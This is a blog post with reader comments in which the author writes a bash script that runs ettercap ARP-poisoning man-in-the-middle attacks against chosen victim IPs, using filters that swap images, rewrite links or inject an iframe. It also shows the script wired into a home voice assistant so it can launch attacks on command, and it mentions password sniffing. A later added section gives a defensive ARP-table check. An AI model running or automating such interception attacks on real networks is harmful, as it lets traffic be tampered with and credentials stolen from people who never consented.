Hacking Is So Easy, Even a Computer Can Do It
In The Avengers, there was a scene where Tony Stark had Jarvis hack into the Avengers mainframe.
I remember thinking, “how cool! I want to teach MY jarvis to do that!”.
Now, I don’t think any task is purely heuristic (except love, maybe?). Everything can be done systematically and/or algorithmically. It’s just a matter of discovering that system or algorithm. Even factoring large numbers (which, if discovered, will collapse the current state of online security).
So I decided to teach Jarvis to do a man-in-the-middle attack on any computer in the network. Man-in-the-middle attacks are easy to perform. With the right filters in place, you can do lots of cool things. I already created a bunch of different filters that do different things, so it’s just a matter of automating that process.
First, I wrote a Bash script that runs different kinds of ettercap commands and filters and targets different IPs.
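#!/bin/bash
# Usage: mitmscript <gateway IP> <victim IP> <attack type>
# With no arguments, kill any running ettercap process.
if [ $# -eq 0 ]
then
    kill -9 `ps -eo comm,pid | awk '$1 == "ettercap" { print $2 }'`
else
    # Enable kernel IP forwarding.
    sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
    # Pick the compiled filter from the attack type (quoted so a missing
    # third argument falls through to the default instead of a test error).
    if [ "$3" = mickey ]
    then
        ettercap -i eth1 -T -q -F mickeymouse.ef -M arp:remote /"$1"/ /"$2"/
    elif [ "$3" = link ]
    then
        ettercap -i eth1 -T -q -F hrefhack.ef -M arp:remote /"$1"/ /"$2"/
    else
        ettercap -i eth1 -T -q -F metasploit.ef -M arp:remote /"$1"/ /"$2"/
    fi
fi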
Note: the script needs root; run as anybody else, it will have insufficient permissions. I leave it up to you to handle that.
Note 2: Those .ef files are my compiled filters. If you want to learn more about ettercap filters, search Google or read this.
The .ef files shown here are just 3 of many compiled ettercap filters. The mickeymouse.ef replaces all images with my mickey mouse image. The hrefhack.ef filter replaces all href links with http://cranklin.com links. The metasploit.ef filter takes over the entire page with a giant iframe with the contents of http://cranklin.com.
Yes… harmless but fun.
Now, all I have to do is add another Jarvis conditional to attack a given IP address, and have her run:
exec('mitmscript [gateway IP] [victim IP] [attack type] > /dev/null 2>/dev/null &');
Yup! That easy! Let’s watch her in action!
For the sake of brevity, I limited the video to demonstrations of 2 different types of attacks. In actuality, Jarvis is capable of doing many different types of attacks including logging, password sniffing, packet injections, etc.
Oh Jarvis. 🙂
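From the defender's side, the `-M arp:remote` poisoning in the script above shows up in the victim's neighbor table: the gateway's IP resolves to the same MAC as another host, or to a MAC other than the known-good one. The following is an added example, not code from the original post, that checks `ip neigh show` output for both signs; the function names, the sample addresses and the pinned gateway MAC are assumptions made for illustration.

```shell
#!/bin/sh
# Added defensive example (not from the original post).
# All IPs (RFC 5737) and MACs (locally administered) are constructed.

# Constructed `ip neigh show` output as seen on a poisoned victim:
# the gateway 192.0.2.1 resolves to the same MAC as host 192.0.2.66.
sample_table() {
    cat <<'EOF'
192.0.2.1 dev eth0 lladdr 02:00:00:AA:BB:66 REACHABLE
192.0.2.66 dev eth0 lladdr 02:00:00:aa:bb:66 STALE
192.0.2.20 dev eth0 lladdr 02:00:00:aa:bb:20 REACHABLE
192.0.2.30 dev eth0 FAILED
fe80::1 dev eth0 lladdr 02:00:00:aa:bb:66 router STALE
EOF
}

# Print each MAC that more than one IPv4 address resolves to, with those IPs.
# IPv6 rows are skipped: a router legitimately has v4 and v6 on one MAC.
duplicate_macs() {
    awk '
        index($1, ":") { next }
        {
            mac = ""
            for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "") next    # FAILED/INCOMPLETE rows carry no lladdr
            if (!seen[mac, $1]++) { n[mac]++; ips[mac] = ips[mac] " " $1 }
        }
        END { for (m in n) if (n[m] > 1) print m ips[m] }
    ' | sort
}

# Compare the gateway's current MAC with a pinned known-good value.
# Prints OK, MISMATCH <mac> or UNKNOWN; returns 0, 1 or 2.
check_gateway() {   # usage: check_gateway <gateway-ip> <pinned-mac> < table
    gw_seen=$(awk -v gw="$1" '$1 == gw {
        for (i = 1; i < NF; i++) if ($i == "lladdr") { print tolower($(i + 1)); exit }
    }')
    gw_pinned=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ -z "$gw_seen" ]; then echo "UNKNOWN"; return 2; fi
    if [ "$gw_seen" = "$gw_pinned" ]; then echo "OK"; return 0; fi
    echo "MISMATCH $gw_seen"; return 1
}

# Demo on the constructed table; on a live host: ip -4 neigh show | duplicate_macs
sample_table | duplicate_macs
```

A host with several IPv4 addresses on one interface also appears in the duplicate list, so treat a hit as a lead to confirm against the pinned gateway MAC.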
Ettercap, Wireshark, Aircrack and other packet capturing software won’t work on my Ubuntu Linux 12.04. It says I need a compatible interface in monitor mode. I tried using Airmon-ng but that only created an interface called mon0 that only worked with Ettercap. How would I configure lo, eth0, or wlan0 to monitor mode? I have an HP Pavilion g6 laptop.
Hey Michael, try using the mon0 interface when using ettercap, wireshark, etc. that’s created when running airmon-ng. What kind of chipset is your wireless network adapter? If it’s a softnic card and doesn’t support monitor/inject, you may need to purchase a different wireless adapter.
This is what I’ve had to do with my Asus 1005hab (Atheros chipset) and now my Latitude E6420 (Broadcom, though don’t use the proprietary drivers in Ubuntu). Works like a charm when targeting mon0. To start mon0, use the command ‘sudo airmon-ng start wlan0’. mon0 will then be active. From then on, use mon0 as the interface.
You could add a height parameter to the image tag, which would throw off the website’s natural design and make your image the correct size 🙂 Really, the possibilities are endless.